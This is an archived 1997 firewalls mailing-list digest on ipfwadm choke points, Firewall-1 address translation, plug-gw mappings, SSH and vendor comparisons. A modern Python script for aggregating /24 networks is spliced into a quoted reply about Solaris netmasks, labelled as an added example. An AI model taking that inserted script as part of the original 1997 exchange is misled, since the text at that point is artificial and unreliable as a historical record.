Date: Wed, 4 Jun 1997 07:01:59 -0400 (EDT)
From: Todd Graham Lewis
To: Joe Klemmer
cc: firewalls@GreatCircle.COM
Subject: Re: ipfwadm question (and procmailrc test)
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Mon, 2 Jun 1997, Joe Klemmer wrote:
>
> I will be setting up a FW using RH Linux and ipfwadm (mainly
> because there's no funding to pay for a commercial product)

FWIW, we do have funding for a commercial product and we're using ipfwadm anyway.

> and I have one
> quick question. It's more related to the physical setup of the FW in
> that, if I'm not mistaken, I'd need to put the FW PC physically in front of
> all the nodes in the LAN, right? IOW, it should look like this:
> (...)

Right. The key point is that you want a single choke point where you can actually _enforce_ your rules about what gets into and what leaves your network. If your firewall isn't the only point of entry for your network, then you can't guarantee this.
(It is possible to secure a network using firewalls without employing this sort of chokepoint model, but the complexities are much greater, as are the possibilities for fucking it up; non-chokepoint firewall setups can only approach chokepoint firewalls in security and, imo, never pass them). Making the firewall a true chokepoint is a simplifying move which makes implementing your policy much, much easier.

Just so you're clear on what a chokepoint means in this context, here's what the physical layout of the network looks like:

------------   ----------------------   ---------   ----------------------
| Internet |---| Ethernet connected |---| Linux |---| Internet, protected|
|          |---| to the Internet    |---| Box   |---| ethernet           |
------------   ----------------------   ---------   ----------------------

Notice that the only way the internal, protected ethernet can get data to the Internet is through your Linux firewall. Because of this, if you decide, e.g., that no TCP traffic on port 23 will get through your Linux box, then the internal network cannot exchange data over port 23 with the outside world, period. This is the foundation of a firewall.

> I know this is in the FW books (Cheswick's and Chapman's) but I haven't
> had time to go into them much. This is really more a sticking point in my
> brain, I guess. I need a better visualization of this whole thing.

Hopefully this was it. If you need more pointers, feel free to contact me in private email or ask the list.

--
Todd Graham Lewis
MindSpring Enterprises
tlewis@mindspring.com

From owner-firewalls-outgoing Wed Jun 4 04:30:11 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id EAA02929 for firewalls-outgoing; Wed, 4 Jun 1997 04:26:16 -0700 (PDT)
Received: from mail.gestronic.ch ([193.246.62.65]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id EAA02823 for ; Wed, 4 Jun 1997 04:25:41 -0700 (PDT)
Received: from raymond_nt4 (sleiman.gestronic.ch [193.246.62.100]) by mail.gestronic.ch (8.8.5/8.8.5) with ESMTP id NAA00837; Wed, 4 Jun 1997 13:24:39 +0200 (MET DST)
Message-ID: <33955741.5A7980ED@gestronic.ch>
Date: Wed, 04 Jun 1997 13:53:38 +0200
From: Raymond Sleiman
X-Mailer: Mozilla 4.0b5 [en] (WinNT; I)
MIME-Version: 1.0
To: "fw-1-mailinglist@us.checkpoint.com" , "firewalls@GreatCircle.COM"
Subject: Address Translation with Firewall 2.1 on Solaris 2.5.1
X-Priority: 3 (Normal)
Content-Type: text/plain; charset=iso-8859-1
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hello,

I defined address translation on a firewall gateway as follows:

193.246.62.140   193.246.62.140   DST_STATIC   195.176.150.10
195.176.150.10   195.176.150.10   SRC_STATIC   193.246.62.140

I added an ARP entry with: arp -s 195.176.150.10 <ethernet address of the machine 193.246.62.10> pub

I also defined static routes to 193.246.62.140 using the internal interface of the firewall:

route add 195.176.150.10 193.246.62.2 (the IP address of the internal interface)

The internal interface has 193.246.62.2 as IP address. The external interface has 195.176.150.2 as IP address; this address is a registered address. The class 195.176.150.0 is a registered class; the class 193.246.62.0 is not a registered address. Addresses are samples and not real.

The problem: I am not able to ping the translated address 195.176.150.10 from the Internet, from the inside, or from the gateway itself. Could someone tell me what is wrong?

Another question: where should we define address translation? How do we load the address translation table (xlate.conf)? Do we have to launch a command to load the address translation configuration? Are the static routes correct?

Best regards
Raymond Sleiman

From owner-firewalls-outgoing Wed Jun 4 05:22:11 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id FAA07002 for firewalls-outgoing; Wed, 4 Jun 1997 05:05:44 -0700 (PDT)
Received: from relay.mnsinc.com (relay1.mnsinc.com [206.55.3.25]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id FAA06986 for ; Wed, 4 Jun 1997 05:05:23 -0700 (PDT)
Received: from snowball.webtrek.com (klemmerj@snowball.webtrek.com [206.239.36.10]) by relay.mnsinc.com (8.8.5/8.7.3) with SMTP id IAA13803 for ; Wed, 4 Jun 1997 08:09:07 -0400 (EDT)
Date: Wed, 4 Jun 1997 08:09:15 -0400 (EDT)
From: Joe Klemmer
Reply-To: klemmerj@webtrek.com
cc: firewalls@GreatCircle.COM
Subject: Re: ipfwadm question (and procmailrc test)
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Wed, 4 Jun 1997, Todd Graham Lewis wrote:

> Hopefully this was it. If you need more pointers, feel free to contact me
> in private email or ask the list.

That was definitely "it". I figured this was how it should look but it's nice to get a clear picture of things. Now it's on to finding someone who has the slightest clue of the physical layout of the network.

---
"It's a damn poor mind that can only think of one way to spell a word."
-- Andrew Jackson

From owner-firewalls-outgoing Wed Jun 4 05:45:27 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id FAA07177 for firewalls-outgoing; Wed, 4 Jun 1997 05:10:35 -0700 (PDT)
Received: from sunphil ([208.142.163.65]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id FAA07143 for ; Wed, 4 Jun 1997 05:09:40 -0700 (PDT)
Received: by sunphil (SMI-8.6/SMI-SVR4) id UAA00805; Wed, 4 Jun 1997 20:08:16 -0800
Date: Wed, 4 Jun 1997 20:08:16 -0800
From: drexx@pspi.com.ph (Drexx Laggui)
Message-Id: <199706050408.UAA00805@sunphil>
To: Boonchai.p@cdg.co.th, fw-1-mailinglist@us.checkpoint.com, firewalls@greatcircle.com
Subject: Re: [FW1] FW-1 compare with Alta Vista Firewall
X-Sun-Charset: US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

|> From: Boonchai Pattanatananon
|> Date: Tue, 3 Jun 1997 20:23:02 +-700
|>
|> Hello folks,
|>
|> Who has comparison of FW-1 3.x with Alta Vista Firewall.
|> Please send it to me.
|>

Hello Boonchai,

Try this: http://www.data.com/lab_tests/firewalls97.html

Ciao, Drexx.

.: This e-mail is made from 100% recycled electrons :.
~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~
DEXTER D. LAGGUI
Systems Engineer, Systems Integration Group
PHILIPPINE SYSTEMS PRODUCTS INC.
Penthouse, Corporate Business Center
150 Paseo de Roxas Ave., Legaspi Village
Makati City, Philippines
Phone: (++ 63-2) 813-6453 to 55 loc.
222
Fax : (++ 63-2) 813-3516
Email: drexx@pspi.com.ph
Pager: (++ 63-2) 1277-33615
~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~

From owner-firewalls-outgoing Wed Jun 4 06:00:24 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id FAA08744 for firewalls-outgoing; Wed, 4 Jun 1997 05:50:32 -0700 (PDT)
Received: from ..southconn.com (southconn.com [199.190.99.2]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id FAA08737 for ; Wed, 4 Jun 1997 05:50:24 -0700 (PDT)
X-ROUTED: Wed, 4 Jun 1997 08:51:22 -0500
X-TCP-IDENTITY: Bryant
Received: from bryant.southconn.com [199.190.99.21] by ..southconn.com with smtp id AIDCCLAF ; Wed, 4 Jun 1997 08:50:42 -0500
Message-ID: <33959035.42BD@southconn.com>
Date: Wed, 04 Jun 1997 08:56:37 -0700
From: Gary Bryant
X-Mailer: Mozilla 2.0 (Win95; U)
MIME-Version: 1.0
To: Firewalls@GreatCircle.COM
Subject: What is SSH ?
References: <199706040800.BAA11243@honor.greatcircle.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Forgive my ignorance but (I am new to this firewall stuff) what is SSH?

Gary Bryant

From owner-firewalls-outgoing Wed Jun 4 06:16:15 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id GAA10492 for firewalls-outgoing; Wed, 4 Jun 1997 06:11:35 -0700 (PDT)
Received: from ACML.COM (gtwy1.acml.com [207.140.173.10]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id GAA10473 for ; Wed, 4 Jun 1997 06:11:23 -0700 (PDT)
From: John_Chen@ACML.COM
Received: from smtpmta.acml.com by ACML.COM (SMI-8.6/SMI-SVR4) id JAA13019; Wed, 4 Jun 1997 09:14:27 -0400
Received: by smtpmta.acml.com(Lotus SMTP MTA v1.05 (305.3 1-15-1997)) id 852564AC.0042EB62 ; Wed, 4 Jun 1997 08:10:56 -0400
X-Lotus-FromDomain: ALLIANCE CAPITAL @ ACML
To: sleiman@gestronic.ch
cc: Fw-1-Mailinglist@Us.Checkpoint.Com, Firewalls@Greatcircle.Com
Message-ID: <852564AC.0049D14D.00@smtpmta.acml.com>
Date: Wed, 4 Jun 1997 09:29:09 -0400
Subject: Re: Address Translation with Firewall 2.1 on Solaris 2.5.1
Mime-Version: 1.0
Content-type: text/plain; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

John Chen @ ALLIANCE CAPITAL
06-04-97 09:29 AM

Be aware of the NAT for which interface, or both; for your problem, defining the outside interface will be better.

sleiman @ gestronic.ch on 04/06/97 07:53:38
To: fw-1-mailinglist @ us.checkpoint.com, firewalls @ GreatCircle.COM
cc: (bcc: John Chen/New York/ACMC)
Subject: Address Translation with Firewall 2.1 on Solaris 2.5.1

Hello,

I defined address translation on a firewall gateway as follows:

193.246.62.140   193.246.62.140   DST_STATIC   195.176.150.10
195.176.150.10   195.176.150.10   SRC_STATIC   193.246.62.140

I added an ARP entry with: arp -s 195.176.150.10 <ethernet address of the machine 193.246.62.10> pub

I also defined static routes to 193.246.62.140 using the internal interface of the firewall:

route add 195.176.150.10 193.246.62.2 (the IP address of the internal interface)

The internal interface has 193.246.62.2 as IP address. The external interface has 195.176.150.2 as IP address; this address is a registered address. The class 195.176.150.0 is a registered class; the class 193.246.62.0 is not a registered address. Addresses are samples and not real.

The problem: I am not able to ping the translated address 195.176.150.10 from the Internet, from the inside, or from the gateway itself. Could someone tell me what is wrong?

Another question: where should we define address translation? How do we load the address translation table (xlate.conf)? Do we have to launch a command to load the address translation configuration? Are the static routes correct?

Best regards
Raymond Sleiman

From owner-firewalls-outgoing Wed Jun 4 07:42:58 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id FAA09093 for firewalls-outgoing; Wed, 4 Jun 1997 05:55:14 -0700 (PDT)
Received: from pdx.com.my (pdx.com.my [192.228.144.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id FAA09073 for ; Wed, 4 Jun 1997 05:55:01 -0700 (PDT)
Received: from wsm.pdx.com.my by pdx.com.my with smtp (Smail3.1.29.1 #3) id m0wZFX4-000BGWC; Wed, 4 Jun 97 20:51 GMT+0800
Message-ID: <33956691.57F6@pdx.com.my>
Date: Wed, 04 Jun 1997 20:58:57 +0800
From: Wong
Organization: CSNet
X-Mailer: Mozilla 3.0Gold (Win95; I)
MIME-Version: 1.0
To: Daniel_Yamaguchi@iscci.com, Jan Guldentops , "Jeremy D. Zawodny"
CC: firewalls@greatcircle.com
Subject: Re: Microsoft Proxy Server
References: <882564A1.00018A6A.00@isc_domino.iscci.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On 23 May 1997, Daniel_Yamaguchi@iscci.com wrote:
>
> All About MickySoft Proxy Server
>
> Security (...???)
> Microsoft's Proxy Server was subjected to extensive security testing and
> evaluation from independent testing agency, Coopers & Lybrand's Information
> Technology Security Services and is resistant to common attacks such as "IP
> Spoofing", "SATAN", and "ISS."
>

C & L is an accounting and consulting firm (correct me if I'm wrong). What do they know about TCP/IP ports, filters (packet-level, application-level), encryption etc.? They might talk about this and that, but do they know how to configure a proxy server or a firewall?

> Manageability & Ease of Use
>
> Integrated with NT User Directory Services, Microsoft Proxy Server allows:
>

Directory Service? Are you sure? Using NOVELL NDS or BANYAN StreetTalk? Or LDAP?

> Easy Administration provided by a clean, easy to understand and easy to
> administer interface.
>

How do you administer multiple servers? And they are spread nation-wide? Unless you are running NetWare 4.x or Banyan.

> Remote Administration via Internet Service Manager allows Microsoft Proxy
> Server to be managed from any Windows NT system on the network.
>

I thought only NetWare has a utility called "rconsole"?

> Web Proxy
>
> Multi-Platform Support - The Web Proxy Server supports all platforms
> including:
> Windows NT Server
> Windows NT Workstation
> Windows '95
> Windows for Workgroups/Win 3.1
> UNIX
> Macintosh

Does IE run on Macintosh or UNIX? NETSCAPE Navigator can.

> Network Compatibility
>
> One of the best features of Microsoft Proxy Server is the use of WinSock
> Proxy to seamlessly provide a gateway between an administrator's existing
> IPX network infrastructure and IP-based network services.
>

At the moment, only NOVELL IntranetWare and C

ISCO IPeXchange have such a feature.

> Integrates with NT network security domain model - Microsoft Proxy Server
> extensively leverages the network-based Windows NT domain security model to
> manage access permission and logging.
>

You must use "Trust" to connect those domains together. And, the "Trust" can be compromised to make the NT trust anybody. Sounds scary . . . .!

> Massive Scalability - Microsoft Proxy Server's cache is limited only by
> Windows NT Server system resources.
>

Can NT scale up to 64 processors, like the SUN servers? Or 12 processors, like the Alpha servers?

Well guys, this is normal MickySoft marketing hype.

On 24 May 1997, Jan wrote:
> Let's put the record straight: if you are running MS-machines you'll need a
> complete firewall to shield it all off. Or you can believe all the
> marketing hype and leave your network completely open....

I agree with what you said.

> At 01:39 AM 5/24/97 -0400, Todd Graham Lewis wrote:
> > On Fri, 23 May 1997 Daniel_Yamaguchi@iscci.com wrote:
> >
> > > We, at ISC Computers & Communications, Inc. feel that this solution will
> > > meet your current needs regarding Internet Security.
> >
> > I, at 1025 Greenwood Avenue Apartment 3 in Atlanta, do not.
>
> Great... *Why not?*

You can scroll up to know why, Jeremy.

Regards.
Wong

From owner-firewalls-outgoing Wed Jun 4 07:52:03 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id GAA13008 for firewalls-outgoing; Wed, 4 Jun 1997 06:29:54 -0700 (PDT)
Received: from cbu.pvtnet.cz (cbu.pvtnet.cz [194.149.105.18]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id GAA12977 for ; Wed, 4 Jun 1997 06:29:43 -0700 (PDT)
Received: from snajdr.pvt.net (snajdr.pvt.net [194.149.103.204]) by cbu.pvtnet.cz (8.8.5/8.7.3) with SMTP id PAA14082; Wed, 4 Jun 1997 15:38:56 +0200 (MET DST)
Message-ID: <33956E4A.6590018C@pvt.net>
Date: Wed, 04 Jun 1997 15:31:54 +0200
From: Petr Snajdr
X-Mailer: Mozilla 3.01 (X11; I; Linux 2.0.30 i586)
MIME-Version: 1.0
To: Gary Bryant
CC: Firewalls@GreatCircle.COM
Subject: Re: What is SSH ?
References: <199706040800.BAA11243@honor.greatcircle.com> <33959035.42BD@southconn.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Gary Bryant wrote:
>
> Forgive my ignorance but (I am new to this firewall stuff) what is SSH?
>
> Gary Bryant

Ssh (Secure Shell) is a program to log into another computer over a network, to execute commands in a remote machine, and to move files from one machine to another. It provides strong authentication and secure communications over insecure channels.

See: http://www.cs.hut.fi/ssh/

--
Petr Snajdr

From owner-firewalls-outgoing Wed Jun 4 07:56:43 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id HAA20772 for firewalls-outgoing; Wed, 4 Jun 1997 07:38:09 -0700 (PDT)
Received: from dskfw1.funb.com ([205.152.122.10]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id HAA20736 for ; Wed, 4 Jun 1997 07:37:58 -0700 (PDT)
Received: (from uucp@localhost) by dskfw1.funb.com (8.8.5/8.8.5) id KAA25019; Wed, 4 Jun 1997 10:41:40 -0400 (EDT)
Received: from cm_mailhost.capmark.funb.com(168.175.82.50) by dskfw1.funb.com via smap (3.2) id xma025006; Wed, 4 Jun 97 10:41:21 -0400
Received: from funws302.capmark.funb.com (funws302 [168.175.7.54]) by cm_mailhost.capmark.funb.com (8.7.5/8.7.3) with ESMTP id KAA10177; Wed, 4 Jun 1997 10:41:19 -0400 (EDT)
Received: (mhorn@localhost) by funws302.capmark.funb.com (8.6.12/8.6.12) id KAA08518; Wed, 4 Jun 1997 10:41:12 -0400
Message-ID: <19970604104101.02710@capmark.funb.com>
Date: Wed, 4 Jun 1997 10:41:01 -0400
From: "Mark Horn [ Net Ops ]"
To: mjr@clark.net
Cc: Firewalls@GreatCircle.COM
Subject: Re: Plug-gw- One to many relationship
References: <199706030631.XAA11683@honor.greatcircle.com> <199706031349.JAA17464@mail.clark.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.75
In-Reply-To: <199706031349.JAA17464@mail.clark.net>; from Marcus J. Ranum on Tue, Jun 03, 1997 at 09:47:53AM +0000
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Marcus J. Ranum says:
> The one to many support requires kernel modifications
> in order to work. Basically, you need code that absorbs
> all packets going through the firewall, and then pulls the
> "real" destination out of the routing layer and connects
> to it. So, unless you want to spend a month or so on
> writing some pretty subtle kernel hacks, you can't do it
> with just FWTK.

That's not entirely true. I've made some modifications to plug-gw that exploit a feature of some operating systems. That feature is that you can assign many IP addresses to a single ethernet interface. I don't know how many OS's support this, but I know SunOS doesn't and Solaris does.

So, let's say that you have the following:

    client A                    server C
                  firewall
    client B                    server D

You want both clients to be able to plug to either server. To accomplish this, assign two addresses to the firewall on the client side and two addresses to the firewall on the server side so that you have:

    client A      W   Y         server C
                 firewall
    client B      X   Z         server D

Where A, B, C, D, W, X, Y, and Z are all IP addresses. On the client side W represents C and X represents D. On the server side, Y represents A, and Z represents B.

So, if client A wants to talk to server D, it connects to IP address W on the firewall.

The plug-gw has to have two modifications to allow this to work. First, it needs to recognize which IP address it was called as (e.g. W or X). Second, it needs to be able to specify a source IP address from which the plugged connection will originate. These are both extremely easy modifications, and I'm not a programmer. So, if you'd like this functionality, I'm sure that you can manage to modify it for yourself (*).

Using my modified plug-gw, the config for the above example would be (assume that the TCP port the servers are listening on is P):

    plug-gw: ip W port P A -plug-to C -srcip Y
    plug-gw: ip X port P A -plug-to D -srcip Y
    plug-gw: ip W port P B -plug-to C -srcip Z
    plug-gw: ip X port P B -plug-to D -srcip Z

Thus if client A wanted to talk to server C on port P, it would connect to IP address W port P. If it wanted server D port P, it would connect to IP address X port P. Etc.

The more generalized syntax is:

    plug-gw: ip <clientIP> port <listenPort> <allowedhosts> \
        -plug-to <destIP> [ -port <destport> ] [ -srcip <fwallIP> ] [ -privport ]

Where

    clientIP      is the IP address on the firewall that is being connected to by the
                  client (e.g. w, x, y, or z)
    listenPort    is the port on the firewall that is being connected to by the client
    allowedhosts  is the ip address of the client that is allowed to connect
    destIP        is the destination ip to plug this connection to
    destport      is the destination port to plug this connection to
    fwallIP       is an address on the firewall which the destination will see the
                  connection as coming from (e.g. w, x, y, or z). If fwallIP is not a
                  valid address on the firewall, the connection will fail.

This works. I have it in use on a couple of different production firewalls. It's certainly not a great solution, but it works without having to make kernel modifications. The problem with this, though, is that it doesn't scale well. There are two reasons:

a) You have to have a unique IP address on the client side of the firewall for every server on the server side. This won't work well if your firewall connects to the Internet where there are a *LOT* of servers.

b) The number of configuration lines to set this up is a multiple of the number of clients, servers, directions and ports. So if you have 50 clients, 2 servers, 1 port, and connections need to be initiated in both directions, you'll need 50 * 2 * 2 * 1 = 200 config lines.

Even if it doesn't scale well, it works and it's not hard to do.

(*) I have read the TIS license agreement and I am *NOT* going to distribute a patch. The license agreement grants me the license to modify the TIS source code for my own organization's use. I'm not a lawyer. I don't know if that means I can't legally distribute patches, but it sure sounds like it.

Cheers,
--
Mark Horn
PGP Public Key available from: http://www.es.net/hypertext/pgp.html
PGP KeyID/fingerprint: 00CBA571/32 4E 4E 48 EA C6 74 2E 25 8A 76 E6 04 A1 7F C1

From owner-firewalls-outgoing Wed Jun 4 08:01:38 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id GAA15229 for firewalls-outgoing; Wed, 4 Jun 1997 06:42:25 -0700 (PDT)
Received: from relay.logicnet.ro (relay.logicnet.ro [193.226.80.252]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id GAA15212 for ; Wed, 4 Jun 1997 06:42:12 -0700 (PDT)
Received: from janus.logictl.net (Emperor@janus.logictl.net [193.226.81.10]) by relay.logicnet.ro (8.8.5/8.8.5) with ESMTP id QAA28441 for ; Wed, 4 Jun 1997 16:45:47 +0300
Received: from janus.logictl.net (janus.logictl.net [193.226.81.10]) by janus.logictl.net (8.8.5/8.8.5) with ESMTP id QAA00205 for ; Wed, 4 Jun 1997 16:45:43 +0300
Message-ID: <33957186.D8E5317F@logicnet.ro>
Date: Wed, 04 Jun 1997 16:45:42 +0300
From: Corneliu Tanasa
Organization: LOGIC TELECOM SA
X-Mailer: Mozilla 4.0b5C (X11; I; Linux 2.0.30 i586)
MIME-Version: 1.0
To: firewalls@greatcircle.com
Subject: Strange logs
X-Priority: 3 (Normal)
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi,

Today I found a line like this in my Cisco logs:

%SEC-6-IPACCESSLOGP: list 183 denied udp xxx.xxx.xxx.xxx(0) -> yyy.yyy.yyy.yyy(162), 1 packet

Has anyone any idea about what this means? I was very surprised about the source port that is zero. Should I be worried that someone is trying an attack?
Thanks,
Corneliu Tanasa

From owner-firewalls-outgoing Wed Jun 4 08:15:38 1997
From: RICK FRATACCIA
Date: 04 Jun 1997 07:58:19 -0500
To: firewalls@GreatCircle.COM, msquared@hypercon.com
Subject: Re: RAPTOR WEBNOT SITE BLOCKING

Mike,

In reference to your comment, do you know if CyberNOT will work with Raptor 4.0 on Solaris? Raptor personnel say that only WebNOT works with Raptor.

Rick

______________________________ Reply Separator _________________________________
Subject: RAPTOR WEBNOT SITE BLOCKING
Author: msquared@hypercon.com at SMTPMAIL
Date: 6/3/97 7:07 PM

It was written:

">From: Allen Rogers
>Subject: Re: Does Raptor WebNOT Block Legitimate Sites?
>
>
>This is a list that Raptor licenses directly from Microsystems.
>The actual URLs used, and their abbreviated nature, is due to how Microsystems chooses
>to create their list. I am trying to open a formal path where our customers
>can present queries/requests to them directly for particular sites. I will
>keep you posted."

CyberPatrol gives two forms at their site for 1) adding a site to the list of blocked sites - http://www.microsys.com/cybernot/form_add.htm or 2) removing a site from the list - http://www.microsys.com/cybernot/form_rev.htm. I've seen them take action in as little as two hours. They have always responded the next business day with a confirming mail note.

Mike

From owner-firewalls-outgoing Wed Jun 4 08:32:03 1997
From: Ken Kempster
Organization: Republic National Bank
Date: Wed, 04 Jun 1997 09:32:25 -0400 (EDT)
To: "Amy (Cremer) Briggs"
Cc: firewalls@GreatCircle.COM
Subject: RE: Solaris

On 03-Jun-97 "Amy (Cremer) Briggs" wrote:
>First of all if there is a better list to post this to please let me know.
>I've checked out Sun's web site and didn't find any mention of a Solaris
>listserv.
>
>Does anyone know how you can trick a Solaris box into
>treating a class C address as a class B. For example we want to use
>2xx.xx.0.0 as a class B address. I've entered the class B subnetmask for

It is possible to turn a class C into a class B but you do it by using non-standard subnet masking; you can't use the standard class B subnet mask. There is a way to calculate the subnet mask based on the range of IPs you will be using within the class C address when you break it up. A book detailing the functionality of the IP stack should have in detail how to do this.

>this network in the /etc/netmasks file which is how I thought you could do it
>but it isn't working for me. It still thinks it's a class C address and won't
>route properly if I set up my routes using it as a class B address.
>Finding a way to make this work would save me hours of time because I
>have 5 full class B (technically class C) networks to do this for and
>entering all the class C's within all 5 class B's would take me awhile as
>well as complicate my routing table.
>
>Thanks for any help or information you can give me.
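Added example, not from Ken's reply or Amy's question: the mask calculation Ken refers to, done for the case in the thread, where a "class B" is really a run of class C (/24) networks. It finds the single prefix and mask that covers all of them (the network/mask pair an /etc/netmasks entry is written as) and lists any address space the aggregate would pull in that is not actually yours, since a too-wide mask makes the host treat other people's addresses as local. The network values are constructed; whether a given Solaris release honours a mask shorter than the natural class mask is not something this checks.

```python
"""Aggregate contiguous /24 networks into one prefix and mask.

Added example, not from the thread. OWNED is constructed (RFC 5737 range);
the second case in the test uses the RFC 2544 benchmarking range.
"""
import ipaddress
from typing import Iterable, List

IPv4Network = ipaddress.IPv4Network

# Constructed: three contiguous class C networks a site might own.
OWNED = ["203.0.113.0/24", "203.0.114.0/24", "203.0.115.0/24"]


def covering_supernet(networks: Iterable[str]) -> IPv4Network:
    """Smallest single prefix that contains every listed network."""
    nets = sorted(ipaddress.ip_network(n, strict=True) for n in networks)
    candidate = nets[0]
    # Widen the lowest network one bit at a time until the highest one fits inside it.
    while not nets[-1].subnet_of(candidate):
        candidate = candidate.supernet()
    return candidate


def not_owned(networks: Iterable[str], supernet: IPv4Network) -> List[IPv4Network]:
    """Address space inside the supernet that is not one of the listed networks.

    Anything returned here would be treated as directly reachable on the local
    wire even though it belongs to someone else; that is the cost of a mask
    that is wider than the address space actually held.
    """
    leftovers = [supernet]
    for owned in sorted(ipaddress.ip_network(n) for n in networks):
        split: List[IPv4Network] = []
        for block in leftovers:
            if owned.subnet_of(block):
                split.extend(block.address_exclude(owned))  # carve the owned piece out
            else:
                split.append(block)
        leftovers = split
    return sorted(leftovers)


def netmasks_entry(supernet: IPv4Network) -> str:
    """Network number followed by its mask, the form an /etc/netmasks line takes."""
    return f"{supernet.network_address} {supernet.netmask}"


if __name__ == "__main__":
    agg = covering_supernet(OWNED)
    print(netmasks_entry(agg))
    print("not yours but inside the mask:", [str(n) for n in not_owned(OWNED, agg)])
```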
>
>Amy
>
> \\\\\\\\\\\\\\Amy Briggs Microcomputer Support Specialist///////////////
> Library of Michigan amyc@libofmich.lib.mi.us
>\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\////////////////////////////////////////////
> ** It's not what you've got, it's what you give--TESLA **

|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
| Ken Kempster               kempster@monarch.rnb.com      |
| Network Systems Engineer          _\|/_                  |
| Republic National Bank            (o o)                  |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~oOO-(_)-OOo~~~~~~~~~~~~~~

From owner-firewalls-outgoing Wed Jun 4 09:00:52 1997
From: Anton J Aylward
Date: Wed, 04 Jun 1997 11:49:24 -0400
To: "Mark Horn [ Net Ops ]"
Cc: Firewalls@GreatCircle.COM
Subject: Re: Plug-gw- One to many relationship

At 10:41 AM 04/06/97 -0400, Mark Horn [ Net Ops ] wrote:
>
>You want both clients to be able to plug to either server. To accomplish
>this, assign two addresses to the firewall on the client side and two
>addresses to the firewall on the server side so that you have:
>
>    client A   W          Y   server C
>                 firewall
>    client B   X          Z   server D

No, no, no, what *I* want and what about 10^7 other sites want is this...
    client A   W               server C
                 firewall      server D
    client B                   server F
                               server G
                               server H
                               server I
                               server K

Now that's what *I* call a one to many mapping. You come up with a good way to do this and you'll be famous. One public address, and a 10.x.x.x of internal addresses and web servers. POW! The address space problem just went away.

Well, we can dream can't we? (maybe I should have littered this with smileys so I don't get flamed. Oh well)

--------------------------------------------------------------------------
Anton J Aylward                    | So, Two cheers for Democracy: one
The Strahn & Strachan Group Inc    | because it admits variety and two
Information Security Consultants   | because it permits criticism.
Voice: (416) 494-8661              |              - E. M. Forster
Fax:   (416) 494-8803              |

From owner-firewalls-outgoing Wed Jun 4 09:02:57 1997
From: Eric Vyncke
Date: Wed, 04 Jun 1997 15:53:05 +0000
To: Pedro Salgueiro, "'Mike Jones'"
Cc: "'firewalls'"
Subject: RE: PIX and Firewall-1

Hi Pedro,

Even if I am working for Cisco, may I add the following inline comments?

You should not confuse between:
- packet filtering routers, i.e.
  plain Cisco or xxx routers with cumbersome and intricate access control lists
- a firewall component which uses a more evolved inspection technique like PIX or Firewall-1

At 09:29 4/06/97 +0100, Pedro Salgueiro wrote:
>Hi to all,
>
>I've been "watching" the discussion regarding the differences between packet-filtering and application level firewalls. I believe that there are some:
>1 - Packet filtering firewalls are more difficult to manage (It is very simple to mis-configure => less secure).
>It may be very complicated establishing rules.

True for routers, not true for components like PIX or Firewall-1. The latter are more protocol aware and thus ACLs are much easier to configure.

>2 - Packet filter systems are always routing packets (so "fail-open" may occur). A well known constructor firewall crashed with a ping attack and routed all the packets from the insecure network to the secure one.

True again for routers, but false for PIX/FW-1.

>3 - If you are using a packet filter system and you provide SMTP, HTTP, etc. you cannot control what the users do with those protocols, i.e., you open or close a port. Application level firewalls provide secure daemons of those protocols.

True again for routers, but false for PIX/FW-1. The latter have the knowledge of HTTP, SMTP, ... protocols and actually analyse the traffic to make their decision.

Hope this helps

>Regards,
>
>Pedro Salgueiro
>
>Data General Portugal
>Tel. +351 - 1 - 4129600
>Fax. +351 - 1 - 4129699
